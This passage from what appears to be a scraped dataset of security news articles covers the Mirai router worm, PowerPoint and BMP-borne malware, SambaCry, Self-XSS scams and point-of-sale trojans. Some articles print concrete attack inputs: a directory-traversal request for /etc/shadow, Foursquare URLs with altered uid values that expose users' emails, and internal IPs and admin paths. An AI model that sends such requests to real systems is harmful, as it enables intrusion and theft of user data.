unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared,"" BadCyber wrote in a blog post. ""It looks like someone decided to weaponize it and create an Internet worm based on Mirai code."" It all started early October when a cyber criminal publicly released the source code of Mirai, a piece of nasty IoT malware designed to scan for insecure IoT devices – mostly routers, cameras, and DVRs – and enslaves them into a botnet network, which is then used to launch DDoS attacks. The hacker created three separate exploit files in order to infect three different architectures: two running different types of MIPS chips and one with ARM silicon. The malicious payloads open the remote administration interface and then attempt to log in using three different default passwords. After this is done, the exploit then closes port 7547 in order to prevent other attackers from taking control of the infected devices. ""Logins and passwords are obfuscated (or ""encrypted"") in the worm code using the same algorithm as does Mirai,"" the researchers say. ""The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list."" More in-depth technical details about the vulnerability can be found on ISC Sans, Kaspersky Lab, and Reverse Engineering Blog. Deutsche Telekom has issued an emergency patch for two models of its Speedport broadband routers – Speedport W 921V, Speedport W 723V Type B – and currently rolling out firmware updates. The company recommends its customers to power down their routers, wait for 30 seconds and then restart their routers in an attempt to fetch the new firmware during the bootup process. If the router fails to connect to the company's network, users are advised to disconnect their device from the network permanently. To compensate the downtime, the ISP is also offering free Internet access through mobile devices to the affected customers until the technical problem is resolved. ",Cyber_Attack How Just Opening A Malicious PowerPoint File Could Compromise Your PC,https://thehackernews.com/2017/08/powerpoint-malware-ms-office.html,"A few months back we reported how opening a simple MS Word file could compromise your computer using a critical vulnerability in Microsoft Office. The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface for which a patch was issued in April this year, but threat actors are still abusing the flaw through the different mediums. Security researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file. According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry. Researchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department. Here's How the Attack Works: The complete attack scenario is listed below: Step 1: The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request. Step 2: Once executed, the PPSX file calls an XML file programmed in it to download ""logo.doc"" file from a remote location and runs it via the PowerPoint Show animations feature. Step 3: The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system. Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely. Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone. Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well. The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability. ",Cyber_Attack Lazarus APT Hackers are now using BMP images to hide RAT malware,https://thehackernews.com/2021/04/lazarus-apt-hackers-are-now-using-bmp.html,"A spear-phishing attack operated by a North Korean threat actor targeting its southern counterpart has been found to conceal its malicious code within a bitmap (.BMP) image file to drop a remote access trojan (RAT) capable of stealing sensitive information. Attributing the attack to the Lazarus Group based on similarities to prior tactics adopted by the adversary, researchers from Malwarebytes said the phishing campaign started by distributing emails laced with a malicious document that it identified on April 13. ""The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed zlib file within a PNG file that then has been decompressed during run time by converting itself to the BMP format,"" Malwarebytes researchers said. ""The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commands/shellcode as well as perform exfiltration and communications to a command and control server."" Created on March 31, 2021, the lure document (in Korean) purports to be a participation application form for a fair in one of the South Korean cities and prompts users to enable macros upon opening it for the first time, only to execute the attack code that triggers the infection chain, ultimately dropping an executable called ""AppStore.exe."" The payload then proceeds to extract an encrypted second-stage payload appended to itself that's decoded and decrypted at run time, followed by establishing communications with a remote server to receive additional commands and transmit the results of those commands back to the server. ""The Lazarus threat actor is one of the most active and sophisticated North Korean threat actors that has targeted several countries including South Korea, the U.S., and Japan in the past couple of years,"" the researchers said. ""Lazarus is known to employ new techniques and custom toolsets in its operations to increase the effectiveness of its attacks."" ",Malware Internet-Connected Medical Washer-Disinfector Found Vulnerable to Hacking,https://thehackernews.com/2017/03/iot-washer-disinfector.html,"Internet-of-Things devices are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices. There are, of course, some really good reasons to connect certain devices to the Internet. For example, remotely switching on your A/C a few minutes before you enter your home, instead of leaving it blasting all day. But does everything need to be connected? Of course, not. One such example is the latest bug report at Full Disclosure, affecting an Internet-connected washer-disinfector appliance by Germany-based manufacturer Miele. The Miele Professional PG 8528 appliance, which is used in medical establishments to clean and properly disinfect laboratory and surgical instruments, is suffering from a Web Server Directory Traversal vulnerability. Jens Regel of German consultancy Schneider & Wulf has discovered the flaw (CVE-2017-7240) that allows an unauthenticated, remote attacker to access directories other than those needed by a web server. Once accessed, the attacker can steal sensitive information stored on the server and even insert their own malicious code and tell the web server to execute it. ""The corresponding embedded web server 'PST10 WebServer' typically listens to port 80 and is prone to a directory traversal attack, [and] therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aid in subsequent attacks,"" Regel explained. Proof-of-Concept Exploit Code Released! Regel also published proof-of-concept (PoC) exploit code for this vulnerability, which means hackers can now exploit the vulnerability before the vendor issue a patch. The PoC exploit is simple for anyone to run: GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN. It's unclear which libraries Miele used to craft the Web server, though, according to Regel, he's able to request the embedded system's shadow file – and by extension any file on the filesystem. The researcher privately disclosed the vulnerability to Miele in November 2016, but did not hear back from the vendor for more than three months. So, it when a fix can be expected (or if it exists) is still unknown. Therefore, the best option to keep yourself secure is to disconnect the appliance from the Internet for the time being until the patch is released. ",Vulnerability Foursquare vulnerability that exposes 45 million users' email addresses,https://thehackernews.com/2014/01/foursquare-vulnerability-that-exposes.html,"A location based Social Networking platform with 45 million users,'Foursquare' was vulnerable to the primary email address disclosed. Foursquare is a Smartphone application that gives you details of nearby cafes, bars, shops, parks using GPS location and also tells about your friends nearby. According to a Penetration tester and hacker 'Jamal Eddine', an attacker can extract email addresses of all 45 million users just by using a few lines of scripting tool. Basically the flaw exists in the Invitation system of the Foursquare app. While testing the app, he found that invitation received on the recipient's end actually disclosing the sender's email address, as shown above. Invitation URL: https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=64761059&sig=mmlx96RwGrQ2fJAg4OWZhAWnDvc%3D Where 'uid' parameter represents the sender's profile ID. Hacker noticed that the parameter in the Invitation URL can be modified in order to spoof the sender profile i.e. Just by modifying the value of 'uid' parameter, one can see the email ID of the respective user. If someone is a good programmer, then dumping the complete database won't be a difficult task. https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=35 https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=60 https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=65 https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=4444 And so forth... The same question still persist that what can be done if someone knows my name and my email id? Many of us use same mail account on all of the social networking sites i.e. Primary email address, and if your personal email address gets leaked from any of the website, someone can start sending you spam, malware or phishing attempts. I think you don't want to be phished by any hacking group like Syrian Electronic hacker or this information can easily aid other cyber attacks. In July, 2013, Similar vulnerability was reported on Facebook, discloses the primary email address of any Facebook user to hackers and spammers. As a responsible bug hunter, he reported the flaw to Foursquare's Security Team, and they have finally fixed the issue. ",Data_Breaches Facebook Self-XSS Scam Fools Users into Hacking Themselves,https://thehackernews.com/2014/07/facebook-self-xss-scam-fools-users-into_28.html,"Scammers have again targeted more than one billion active users of the popular social networking giant Facebook, to infect as many victims as possible. Not by serving fake post, neither by providing malicious video link, instead this time scammers have used a new way of tricking Facebook users into injecting or placing malicious JavaScript or client-side code into their web browsers. This malicious code could allow an attacker to gain access to victims' accounts, thereby using it for fraud, to send spams, and promoting further attacks by posting the scam on timeline to victims' friends. This technique is known as Self Cross-site Scripting or Self XSS. Self-XSS (Self Cross-Site Scripting) scam is a combination of social engineering and a browser vulnerability, basically designed to trick Facebook users' into providing access to their account. Once an attacker or scammer gets access to users' Facebook account, they can even post and comment on things on users' behalf. In order to infect Facebook user, the cyber crooks send a phishing message via an email or a Facebook post from one of the friends in the list of the targeted victim claiming, in this case, a way to hack any Facebook user by following some simple steps. The posted scam looks as follows: Hack any Facebook account following these steps: 1. Go to the victim's profile 2. Click right click then click on inspect element and click the ""Console"" tab. 3. Paste the code into the box at the bottom and press Enter. The code is in the web site: https://textuploader .com****/ Good luck: * Don't hurt anybody… They want you to follow the given instructions by copy and pasting the malicious code, as given in the above instructions, for taking over someone else's account. The trick is suitable for both Google Chrome and Mozilla Firefox users. Once you self inject this malicious script to your account, it will give away the access of your whole account to the one who could do a variety of malicious activities, basically spreading all sorts of malicious campaigns. The hackers can also infect victim's computer with malware that can collect banking details and send them to a remote location controlled by them. Facebook has also listed the scam on the list of threats its users have been observed to fall victim to. ""Scammers who use Self-XSS usually trick you by promising to help you hack somebody else's account,"" reads the post. ""The scammer's goal is to get you to run their malicious code on your computer. When you run their code, you grant the scammer access to your account for fraud, spam, and tricking more people into running the scam."" Spotting these scams and reporting them are the best way to protect yourself, but if you fall victim to one of these attacks, don't panic! Follow the link to learn more about protecting your Facebook account. Facebook is also working with various browser vendors to add protection in the browser in an effort to prevent this vector from being exploited. ",Vulnerability Hackers Exploit Unpatched Windows XML vulnerability,https://thehackernews.com/2012/06/hackers-exploit-unpatched-windows-xml.html,"Hackers Exploit Unpatched Windows XML vulnerability An unpatched vulnerability in the Microsoft XML Core Services (MSXML) is being exploited in attacks launched from compromised websites to infect computers with malware. This zero-day exploit that potentially affects all supported versions of Microsoft Windows, and which has been tied to a warning by Google about state-sponsored attacks, has been identified carrying out attacks in Europe. Microsoft security bulletin MS12-037 was this month's cumulative update for Internet Explorer. It is rated as Critical, and addresses 14 separate vulnerabilities that affect every supported version of Internet Explorer in some way.One vulnerability in particular is more urgent than the rest, though. There are multiple attacks circulating online that target CVE-2012-1875.The name of the vulnerability is ""Same ID Property Remote Code Execution Vulnerability"", which doesn't really explain much. Until a patch is released, the Microsoft workaround is the only way to stymie hackers. Many security vendors have updated their products to detect malicious code that tries to exploit the vulnerability. Exploit code that works on all versions of Internet Explorer on Windows XP, Vista and 7 has been added to the Metasploit penetration testing framework. Microsoft has provided a temporary fix for the vulnerability that all Windows users should apply whether or not they use IE as their browser of choice. Most antivirus products have added signatures to detect and block exploits. In addition, you can also run the Fix-It tool from Microsoft. The automated tool implements measures to block the attack vector used to exploit this vulnerability. ",Vulnerability New Linux Malware Exploits SambaCry Flaw to Silently Backdoor NAS Devices,https://thehackernews.com/2017/07/linux-malware-sambacry.html,"Remember SambaCry? Almost two months ago, we reported about a 7-year-old critical remote code execution vulnerability in Samba networking software, allowing a hacker to remotely take full control of a vulnerable Linux and Unix machines. We dubbed the vulnerability as SambaCry, because of its similarities to the Windows SMB vulnerability exploited by the WannaCry ransomware that wreaked havoc across the world over two months ago. Despite being patched in late May, the vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances, researchers at Trend Micro warned. For those unfamiliar: Samba is open-source software (re-implementation of SMB/CIFS networking protocol), which offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems, including Linux, UNIX, IBM System 390, and OpenVMS. Shortly after the public revelation of its existence, the SambaCry vulnerability (CVE-2017-7494) was exploited mostly to install cryptocurrency mining software—""CPUminer"" that mines ""Monero"" digital currency—on Linux systems. However, the latest malware campaign involving SambaCry spotted by researchers at Trend Micro in July mostly targets NAS devices used by small and medium-size businesses. SHELLBIND Malware Exploits SambaCry to Targets NAS Devices Dubbed SHELLBIND, the malware works on various architectures, including MIPS, ARM and PowerPC, and is delivered as a shared object (.SO) file to Samba public folders and loaded via the SambaCry vulnerability. Once deployed on the targeted machine, the malware establishes communication with the attackers' command and control (C&C) server located in East Africa, and modifies firewall rules to ensure that it can communicate with its server. After successfully establishing a connection, the malware grants the attackers access to the infected device and provides them with an open command shell in the device, so that they can issue any number and type of system commands and eventually take control of the device. In order to find the affected devices that use Samba, attackers can leverage the Shodan search engine and write the original malware files to their public folders. ""It is quite easy to find devices that use Samba in Shodan: searching for port 445 with a 'samba' string will turn up a viable IP list,"" researchers said while explaining the flaw. ""An attacker would then simply need to create a tool that can automatically write malicious files to every IP address on the list. Once they write the files into the public folders, the devices with the SambaCry vulnerability could become ELF_SHELLBIND.A victims."" However, it is not clear what the attackers do with the compromised devices and what's their actual motive behind compromising the devices. The SambaCry vulnerability is hell easy to exploit and could be used by remote attackers to upload a shared library to a writable share and then cause the server to load and execute the malicious code. The maintainers of Samba already patched the issue in Samba versions 4.6.4/4.5.10/4.4.14, so you are advised to patch your systems against the vulnerability as soon as possible. Just make sure that your system is running updated Samba version. Also, attackers need to have writable access to a shared location on the target system to deliver the payload, which is another mitigating factor that might lower the rate of infection. ",Malware Malicious Infrared X-Ray Android app infecting users in Japan,https://thehackernews.com/2013/03/malicious-infrared-x-ray-android-app.html,"Researchers are already warning that malware authors developing more sophisticated attack techniques for mobile devices, using encryption and randomization or hiding malicious code in image files. As analyzed by Symantec a malicious Infrared X-Ray Android application, attempting to lure Android device owners to download an app that supposedly allows the camera on the device to see through clothes. This malware app is spreading quickly widely in Japan by sending the spam messages via SMS to phone numbers stored in the device's Contacts, so that the recipients of the spam to be tricked easier because the invitation to download the app is coming from someone they know rather than from an unknown sender. The app is designed to steals all details in the device's contact list and are uploaded to a predetermined server. Symantec confirmed that there are several variants of this app exist, ""..the latest variants have added an interesting payload: rather than sending SMS messages to the victim's friends and family, the ultimate goal is to scam the victim with something similar to what is called one-click fraud in Japan"" Hamada said on blog. Moreover, in order to make it difficult for the victim to uninstall the app, it removes itself from the launcher after it is initially executed, although it can be removed in Applications under Settings. Researchers suggest to refrain from clicking links found in messages such as emails and SMS messages from unknown senders as well as suspicious messages from known senders. ",Malware Update your Mac OS X — Apple has released Important Security Updates,https://thehackernews.com/2016/09/apple-mac-os-x-update.html,"If you own a Mac laptop or desktop, you need to update your system right now. It turns out that the critical zero-day security vulnerabilities disclosed last week, which targeted iPhone and iPad users, affect Mac users as well. Late last week, Apple rolled out iOS 9.3.5 update to patch a total of three zero-day vulnerabilities that hackers could have used to remotely gain control of an iPhone by simply making the victim click a link. Dubbed ""Trident,"" the security holes were used to create spyware (surveillance malware) called 'Pegasus' that was apparently used to target human rights activist Ahmed Mansoor in the United Arab Emirates. Pegasus could allow an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, user's location, microphone. Pegasus Spyware could even allow an attacker to fully download victim's passwords and steal the stored list of WiFi networks, as well as passwords the device connected to. Apple is now patching the same ""Trident"" bugs in Safari web browser on its desktop operating system, with urgent security updates for Safari 9 as well as OS X Yosemite and OS X El Capitan. However, this is not a surprise because iOS and OS X, and mobile and desktop version of Safari browser share much of the same codebase. Therefore, zero-days in Apple's iOS showed up in OS X as well. Pegasus exploit takes advantage of Trident bugs to remotely jailbreak and install a collection of spying software onto a victim's device, without the user's knowledge. One of the key tools of the exploit takes advantage of a memory corruption bug in Safari WebKit, allowing hackers to deliver the malicious payload when a target victim clicks on a malicious link and initiate the process of overtaking the operating system. In an advisory, Apple warned that visiting a ""maliciously crafted website"" via Safari browser could allow attackers to execute arbitrary code on a victim's computer. The patch updates that Apple released on Thursday fix the nasty Trident bugs, including CVE-2016-4654, CVE-2016-4655, and CVE-2016-4656, which were initially discovered and reported by mobile security startup Lookout and the University of Toronto's Citizen Lab. Based on a link sent to UAE human rights activist Ahmed Mansoor, Lookout Security, and Citizen Lab traced the three programming blunders and its Pegasus spyware kit to Israeli ""cyber war"" organization NSO Group, which sells hacking exploits to governments like the UAE. Users can install security patches for Safari, El Capitan, and Yosemite via the usual software update mechanisms. ",Vulnerability "Google, Paypal, Facebook Internal IP disclosure vulnerability",https://thehackernews.com/2012/12/google-paypal-facebook-internal-ip.html,"Do you have any idea about an Internal IP Address or a Private IP Address that too assigned for Multinational Companies? Yeah, today we are gonna discuss about Internal IP or Private IP address Disclosure. Disclosure of an Internal IP like 192.168.*.* or 172.16.*.* , can really Impact ? Most security researchers call it as ""bull shit"" vulnerability. But when it comes to impact calculation even if the server is behind a firewall or NAT, an attacker can see internal IP of the remote host and this may be used to further attacks. Internet Giants like Facebook, Google, PayPal and Serious National Security organizations like FBI, Pentagon and NASA are taking initiatives for their Security Issues. At same, we at 'The Hacker News' stand together for organizations that talk about national security in a serious way. I guess,its the time to understand about the flaws and its impacts where I would like to share my findings about our Internet Giants and Organizations. Facebook - Internal IPv4 Address and Session Cookie Disclosure Facebook spent $8.5 million to buy fb.com. According to the many report available on the internet says ""fb.com is for Facebook Internal Use Only"". URL - https://newsroom.fb.com/v/?id=467&skip=False Internal IP : 192.168.149.88 Session Cookie : Session Cookie Generation probably depends the administration from their admin panel located at https://newsroom.fb.com/admin/login.aspx?RefUrl=%2fadmin%2fdefault.aspx PayPal - [ www.paypal.com & www.where.com ] Paypal is being the largest in the e-banking business has its Internal IPv4 Address and Other Server Detail Disclosure while accessing one of its sub domain. URL - https://ad.paypal.com/jin/info.jsp Internal IP Range - 192.168.*.* URL - https://www.where.com/jin/info.jsp URL - https://api.where.com/jin/info.jsp Google - [ Server Path Disclosure] Recently , I came across an issue reported by an user on Google Code website to Google Team members of modpagespeed project.. mod_pagespeed is an open-source Apache module created by Google to help Make the Web Faster by rewriting web pages to reduce latency and bandwidth. If you closely analyze the URL mentioned in the forum post you might get some encoding error. But if you access the URL via Google Web-Cache ( Interesting Part: Using Google Service to Retrieve Information of Other Google Services ) Vulnerable Domain: dl.google.com Vulnerability: Server Path Disclosure Steps to Reproduce: Access Google Web-Cache URL: Click Here Cron Job Info of Google Talk, Plugins and Google Chrome Google Talk - Cron Job Info , Path Disclosed: Cache URL /etc/cron.daily/google-chrome /opt/google/chrome/PepperFlash/libpepflashplayer.so /opt/google/chrome/chrome-sandbox /opt/google/chrome/chrome.pak /opt/google/chrome/chrome_100_percent.pak /opt/google/chrome/default-app-block Google Talk Plugin - Cron Job Info, Path Disclosed: Cache URL google-talkplugin-3.10.2.0-1.src.rpm /etc/cron.daily/google-talkplugin Google Chrome- Cron Job Info, Path Disclosed: Cache URL google-chrome-beta-24.0.1312.40-172509.src.rpm /usr/bin/google-chrome/ etc/cron.daily/google-chrome NASA Internal IP, Subnet mask disclosure in a publicly available file at NASA ftp (now deleted) can be seen via Google cache. Tata Consultancy Services TCS was also having similar internal IP disclosure flaw, recently fixed. We have a screenshot of that In the above screenshot we can easily find the Microsoft OLDE DB provider Information and the Server Internal (Private IP Address : 192.168.15.65). This may disclose information about the IP addressing scheme of the internal network. This information can be used to conduct further attacks. For a hacker Information is like a treasure and gathering each and every small information = Treasure hunting. Vulnerability either low or Critical, its still remains a vulnerability. ",Vulnerability SQL Injection Vulnerability in 'Yahoo! Contributors Network',https://thehackernews.com/2014/10/sql-injection-vulnerability-in-yahoo.html,"Yahoo! Contributors Network (contributor.yahoo.com), the network of authors that generated the contents such as photographs, videos, articles and their knowledge to more than 600 million monthly visitors, was vulnerable to a Time based Blind SQL Injection vulnerability. Behrouz Sadeghipour, a security researcher reported the Blind SQLi vulnerability in Yahoo!'s website that could be exploited by hackers to steal users' and authors' database, containing their personal information. Behrouz reported this flaw to Yahoo! Security team few months back. The team responded positively and within a month they patched the vulnerability successfully. Unfortunately after that Yahoo! announced to shut down 'Yahoo Contributors Network' due to its decreasing popularity and removed all the contents from the web, except some of the ""work for hire"" content may remain on the web. The critical vulnerability was able to expose the database which carried sensitive and personal information of those authors who was participating and getting paid from their work. While looking around the website, the researcher came across two vulnerabilities in the following URL/files: https://contributor.yahoo.com/forum/search/? https://contributor.yahoo.com//library/payments/data-table/? The vulnerability allows remote attackers to inject own SQL commands to breach the database of the above vulnerable URLs and get access to the users' personal data. In 2012, Yahoo! Contributors Network was hacked by a group of hackers called ""D33DS Company"" and ""Owned and Exposed"" data breach exposed stolen 453,491 email addresses and passwords online. Reportedly, at that time hackers used the same technique i.e. SQL Injection attack to carry out the data breach. SQL INJECTION AND ITS IMPACTS SQL Injection (SQLi) attacks have been around for over a decade. It involves inserting a malformed SQL query into an application via client-side input. SQLi vulnerabilities are ranked as Critical one because if it is used by Hackers, it will cause a database breach which will lead to confidential information leakage. In fact, according to Veracode's 2014 State of Security Software Report , SQL injection vulnerabilities still plague 32% of all web applications. ""We are currently seeing more than 50,000 attacks per day that fall into our SQL Injection categorization. Most of them are automated and try to compromise well known vulnerabilities in common CMS's and web projects (Joomla, WordPress, vBulletin, etc),"" the security researcher, David Dede, of the security firm Sucuri wrote in a blog post. SQL INJECTION CONTINUE TO GROW The analysis carried out by the security firms shows that the number of SQL injection attempts continue to grow as the time passes on. ""If we drill down into our data and hook it up to a geo locator we can also see that the attacks come from everywhere. Most people tend to think that Russia, Brazil, Romania and a few other countries are the ""bad"" sources, but for SQL injection, the top attackers come from the USA, India, Indonesia and China,"" the researcher added. SQL Injections are a real threat and are being actively attacked and exploited by hackers every day. ""If you are a developer you should be leveraging the OWASP SQL Injection Prevention Cheat Sheet at a minimum."" ",Data_Breaches Hackers Spotted Using Morse Code in Phishing Attacks to Evade Detection,https://thehackernews.com/2021/08/hackers-spotted-using-morse-code-in.html,"Microsoft has disclosed details of an evasive year-long social engineering campaign wherein the operators kept changing their obfuscation and encryption mechanisms every 37 days on average, including relying on Morse code, in an attempt to cover their tracks and surreptitiously harvest user credentials. The phishing attacks take the form of invoice-themed lures mimicking financial-related business transactions, with the emails containing an HTML file (""XLS.HTML""). The ultimate objective is to harvest usernames and passwords, which are subsequently used as an initial entry point for later infiltration attempts. Microsoft likened the attachment to a ""jigsaw puzzle,"" noting that individual parts of the HTML file are designed to appear innocuous and slip past endpoint security software, only to reveal its true colors when these segments are decoded and assembled together. The company did not identify the hackers behind the operation. ""This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving,"" Microsoft 365 Defender Threat Intelligence Team said in an analysis. ""The HTML attachment is divided into several segments, including the JavaScript files used to steal passwords, which are then encoded using various mechanisms. These attackers moved from using plaintext HTML code to employing multiple encoding techniques, including old and unusual encryption methods like Morse code, to hide these attack segments Opening the attachment launches a browser window that displays a fake Microsoft Office 365 credentials dialog box on top of a blurred Excel document. The dialog box shows a message urging the recipients to sign in again due to reasons that their access to the Excel document has purportedly timed out. In the event the user enters the password, the individual is alerted that the typed password is incorrect, while the malware stealthily harvests the information in the background. The campaign is said to have undergone 10 iterations since its discovery in July 2020, with the adversary periodically switching up its encoding methods to mask the malicious nature of the HTML attachment and the different attack segments contained within the file. Microsoft said it detected the use of Morse code in the attacks' February and May 2021 waves, while later variants of the phishing kit were found to direct the victims to a legitimate Office 365 page instead of showing a fake error message once the passwords were entered. ""Email-based attacks continue to make novel attempts to bypass email security solutions,"" the researchers said. ""In the case of this phishing campaign, these attempts include using multilayer obfuscation and encryption mechanisms for known existing file types, such as JavaScript. Multilayer obfuscation in HTML can likewise evade browser security solutions. ",Cyber_Attack AwSnap! New Hack Can Crash Chrome Browsers of Mass Audience,https://thehackernews.com/2015/04/awsnap-chrome-crash.html,"Few weeks back, we reported how a string of just 13 characters could cause your tab in Chrome to crash instantly. However, there was an exception that this special 13 characters string was only working on Mac OS X computers with no impact on Windows, Android, or iOS operating systems. Now, a recent hack against Chrome browser could crash your Chrome version 41 and above for Mac OS X, Windows and Chrome OS. At the time of writing, Chrome 41 seems to crash on long and/or malformed URLs. The details of this crash bug, dubbed as AwSnap, is described on Github. Warning: DO NOT CLICK on this LINK, which actually points to a Reddit thread that crashes Chrome browser because a Reddit user-submitted post containing the crash content. Just like a post, crashing a thread via a comment is also possible. Chrome crash occurs only when accessing the long and/or malformed URLs through a web server, which means using file:// will not crash your Chrome browser. Examples of long and/or malformed URLs that cause the Chrome browser to crash: The crash issue appears to be small but is really serious, as it is possible for anyone to post the malformed URLs on a discussion forum, such as Reddit, and make the thread unavailable to all users. So, we recommend our users to do not post or drop the malformed URLs in comments or on your Facebook timeline. At the time of writing, the AwSnap bug has been confirmed in Chrome 41 and patched in Chrome 42, & 43 running on MacOS, Windows and Chrome OS. However, there are mixed reports on Ubuntu. ",Vulnerability 3 New Code Execution Flaws Discovered in Atlantis Word Processor,https://thehackernews.com/2018/11/word-processor-vulnerability.html,"This is why you should always think twice before opening innocent looking email attachments, especially word and pdf files. Cybersecurity researchers at Cisco Talos have once again discovered multiple critical security vulnerabilities in the Atlantis Word Processor that allow remote attackers to execute arbitrary code and take over affected computers. An alternative to Microsoft Word, Atlantis Word Processor is a fast-loading word processor application that allows users to create, read and edit word documents effortlessly. It can also be used to convert TXT, RTF, ODT, DOC, WRI, or DOCX documents to ePub. Just 50 days after disclosing 8 code execution vulnerabilities in previous versions of Atlantis Word Processor, Talos team today revealed details and proof-of-concept exploits for 3 more remote code execution vulnerabilities in the application. All the three vulnerabilities, listed below, allow attackers to corrupt the application's memory and execute arbitrary code under the context of the application. Incorrect Calculation of Buffer Size (CVE-2018-4038) — an exploitable arbitrary write vulnerability resides in the open document format parser of Atlantis Word Processor while trying to null-terminate a string. Improper Validation of Array Index (CVE-2018-4039) — an out-of-bounds write vulnerability exists in the PNG implementation of. Use of Uninitialized Variable (CVE-2018-4040) — an exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Processor. All these vulnerabilities affect Atlantis Word Processor versions 3.2.7.1, 3.2.7.2 and can be exploited by convincing a victim into opening a specially crafted malicious booby-trapped document. Talos researchers responsibly reported all the vulnerabilities to the developers of the affected software, who have now released an updated version 3.2.10.1 that addresses the issues. If you haven't yet, you are highly advised to update your word processing software to the latest version and security enthusiasts who are interested in learning more about these issues can head on to Talos blog for technical details. The easiest way to prevent yourself from being a victim of attacks leveraging such vulnerabilities is never to open any document provided in an email from unknown or untrusted sources. ",Malware Tor-enabled Point-of-Sale malware 'ChewBacca' stole Credit Card data from 11 Countries,https://thehackernews.com/2014/01/tor-enabled-point-of-sale-malware.html,"After the massive data breaches at U.S retailers Target and Neiman Marcus in which financial credentials of more than 110 million and 1.1 million customers were compromised respectively, shows that the Point of Sale (POS) system has become a new target for the cyber criminals. Despite the BlackPOS malware of Point of Sale (POS) system that comes out as the major cause of these data breaches, malware writers are upgrading and developing more Trojans to target POS system. In December, the security researchers at anti-virus firm Kaspersky Lab discovered a Tor-based banking trojan, dubbed ""ChewBacca""_x0081_, that was initially categorized as a Financial trojan, but recently security researchers at RSA have uncovered that 'ChewBacca' is also capable of stealing credit card details from point of sale systems. 'ChewBacca', a relatively new and private Trojan, used in the 11 countries as a POS malware is behind the electronic theft. ChewBacca communicates with its C&C (Command and Control) server over the Tor network obscuring the IP addresses of parties. ChewBacca steals data from the POS system in two ways: Generic keylogger that captures all the keystrokes. Memory scanner that reads process memory and dumps the credit card details. The botnet has been collecting track 1 and track 2 data of payment card since October 25, according to RSA. During installation, ChewBacca creates a copy of itself as a file named ""spoolsv.exe""and place it in the windows Start > Startup folder, so that it can automatically start-up at the login time. After installation, the keylogger program creates a log file called ""system.log"" inside the system %temp% folder that contains the keystroke events along with the window focus changes. ""The ChewBacca Trojan appears to be a simple piece of malware that, despite its lack of sophistication and defense mechanisms, succeeded in stealing payment card information from several dozen retailers around the world in a little more than two months."" Neither the RSA nor the Kaspersky descriptions explain how the ChewBacca bot is propagated, but the RSA investigation has observed it mostly in the US and also detected in 10 other countries, including Russia, Canada and Australia. The RSA has provided the data to the FBI on the ChewBacca operation, including the location of a command-and-control server used by the hackers. They advised retailers to increase staffing levels and develop leading-edge capabilities to detect and stop attackers (comprehensive monitoring and incident response), encrypt or tokenize data at the point of capture and ensure that it is not in plain text view on their networks, thereby shifting the risk and burden of protection to the card issuers and their payment processors. ",Malware Dutch Police arrested TorRAT Malware Gang for stealing over Million Dollar,https://thehackernews.com/2013/10/dutch-police-arrested-torrat-malware.html,"The TorRAT malware was first appeared in 2012 as spying tool only. But from August 2012, Bitcoin Mining feature was added and it became a powerful hacking tool that was commonly associated with attacks on Financial institutions. ab This year TorRat Malware targeted two out of three major Banks in the Netherlands and the criminals stole over Million Dollars from user' Banking Accounts. The Dutch police has arrested four men from Alkmaar, Haarlem, Woubrugge and Roden on last Monday, who are suspected of involvement in the large scale digital fraud and money laundering case using TorRat Malware. Using Spear Phishing techniques, gang targeted the victims to access their computers and the Financial accounts. The gang used anonymous VPN services, Bitcoins, TorMail and the Tor network itself to remain anonymous. Malware is also capable of manipulating the information during online banking, can secretly add new payment orders and also able to modify existing orders. To defend the detection from Antivirus softwares, TorRat uses the ZeuS malware in its attack. The technique was used to divert the focus of researchers to remove ZeuS infection, rather than the unknown malware on the system. Some of the stolen money was converted by criminals to (56 BTC worth around 7700 Euros) Bitcoin virtual currency, which are now seized by Dutch police. Police also mentioned that, one of arrested criminal having his own Bitcoin exchange service. The TorRAT malware has been known to be distributed in multiple ways. In April, TorRat was in news for hijacking twitter accounts. After infecting a vulnerable computers, the TorRAT malware hijacks the Twitter user's account and share links that lead to attack websites that attempt to inject TorRAT malware into the victim's computer. The main reason why this particular attack is so effective is because victims are essentially receiving links to the TorRAT malware from sources they trust; accounts that they follow on Twitter. TorRAT malware involves using Man-in-the-Browser (MitB) tactics to infect computers through vulnerabilities in their Web browser. These kinds of attacks were used to take over a victim's 